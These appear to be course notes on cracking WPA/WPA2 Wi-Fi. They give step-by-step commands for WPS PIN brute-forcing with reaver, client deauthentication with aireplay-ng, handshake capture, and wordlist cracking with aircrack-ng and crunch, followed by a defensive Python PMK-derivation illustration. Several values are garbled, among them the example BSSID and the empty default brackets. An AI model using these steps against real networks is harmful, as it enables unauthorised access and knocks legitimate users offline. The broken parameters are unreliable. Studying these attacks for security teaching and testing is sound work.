WPA Cracking

  • WPA was designed to address the issues in WEP and provide better encryption.
  • The main issue in WEP is the short IV, which means IVs can be repeated; by collecting a large number of IVs, aircrack-ng can determine the key stream and the WEP key.
  • In WPA each packet is encrypted with a unique temporary key, which means the number of data packets that we collect is irrelevant.
  • WPA and WPA2 are similar; the only difference is that WPA2 uses an algorithm called CCMP.

WPS Feature

WPS is a feature that allows users to connect to WPS-enabled networks easily, using a WPS button or simply by clicking on the WPS functionality.

Authentication is done using an 8-digit PIN. This means that there is a relatively small number of PIN combinations, and using brute force we can guess the PIN in less than 10 hours.

A tool called reaver can then recover the WPA/WPA2 key from the PIN.

Note: This flaw is in the WPS feature and not in WPA/WPA2; however, it allows us to crack any WPA/WPA2 AP without using a wordlist and without any clients.

Use a tool called wash to scan for WPS-enabled APs.

Use a tool called reaver to brute force the WPS PIN and calculate the WPA key:

wash -i wlan0
airodump-ng wlan0
reaver -b [bssid] -c [channel] -i wlan0
reaver --help

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) , Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or / digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts []
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts []
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after unexpected failures []
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period []
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-/)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack

Example:
reaver -i wlan0mon -b ::4C:C1:AC: -vv

Refer to: https://www.ethicalhackx.com/hack-wpawpa2-wps-reaver-kali-linux/

Theory behind WPA/WPA2 cracking

Capturing WPA data packets is not useful, as they do not contain any information that can be used to crack the key. The only packets that contain information that helps us crack the password are the handshake packets. Every time a client connects to the AP, a four-way handshake occurs between the client and the AP.

By capturing the handshake, we can use aircrack-ng to launch a wordlist attack against the handshake to determine the key.

To crack a WPA/WPA2 AP with WPS disabled we need two things:

1. Capture the handshake.
2. A wordlist.

Cracking WPA/WPA2 - Capturing the handshake

Handshake packets are sent every time a client associates with the target AP. So to capture it we are going to:

1. Start airodump-ng on the target AP:

airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]

2. Wait for a client to connect to the AP, or deauthenticate a connected client (if any) for a very short period of time so that their system connects back automatically:

aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]

Notice that the top right corner of airodump-ng will say "WPA handshake".

Cracking WPA/WPA2 - Creating a Wordlist

The second thing that we need to crack WPA/WPA2 is a list of passwords to guess. You can download a ready-made wordlist from the internet or create your own using a tool called crunch.

Resource - Some links to wordlists

ftp://ftp.openwall.com/pub/wordlists/
http://www.openwall.com/mirrors/
http://gdataonline.com/downloads/GDict/
http://www.outpost9.com/files/WordLists.html
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://wordlist.sourceforge.net/

./crunch [min] [max] [characters=lower/upper/numbers/symbols] -t [pattern] -o file

Cracking WPA/WPA2 - Cracking the Key

We are going to use aircrack-ng to crack the key. It does this by combining each password in the wordlist with the AP name (ESSID) to compute a Pairwise Master Key (PMK) using the PBKDF2 algorithm; the PMK is then compared against the handshake file.

aircrack-ng [HANDSHAKE FILE] -w [WORDLIST] [INTERFACE]
E.g.: aircrack-ng test-handshake-.cap -w sample-wordlist
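As an added illustration (not code from the original course notes or from aircrack-ng), the following Python derives the PMK exactly as described above, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and checks it against the public IEEE 802.11 test vector ("password" / "IEEE"). It shows why the SSID acts as a per-network salt and why the cost of each guess, 4096 iterations, makes passphrase length and randomness the only real defence against an offline wordlist attack; the SSID value "HomeNet-7f3a" is a constructed sample.

```python
import hashlib

# Public IEEE 802.11 test vector for the passphrase-to-PSK mapping.
IEEE_TEST_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)

PBKDF2_ITERATIONS = 4096  # fixed by the 802.11 standard
PMK_LEN = 32              # 256-bit PMK


def is_valid_passphrase(passphrase: str) -> bool:
    """802.11 passphrases are 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-Personal PMK from passphrase and SSID.

    PBKDF2-HMAC-SHA1, salted with the SSID, 4096 iterations, 32-byte output.
    Because SHA1 yields 20 bytes, a 32-byte key needs two PBKDF2 blocks, so
    each candidate costs 2 * 4096 = 8192 HMAC-SHA1 computations. This is the
    per-guess work aircrack-ng performs for every entry in the wordlist.
    """
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, dklen=PMK_LEN,
    )


def check_test_vector() -> bool:
    """True if our derivation reproduces the IEEE 802.11 test vector."""
    passphrase, ssid, expected_hex = IEEE_TEST_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


if __name__ == "__main__":
    print("IEEE test vector reproduced:", check_test_vector())
    # Same passphrase, different SSID: the SSID is the PBKDF2 salt, so a PMK
    # table precomputed for one (e.g. default) SSID does not carry over to a
    # network with a unique SSID. "HomeNet-7f3a" is a constructed sample.
    print("PMK for SSID IEEE        :", derive_pmk("password", "IEEE").hex())
    print("PMK for SSID HomeNet-7f3a:", derive_pmk("password", "HomeNet-7f3a").hex())
```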
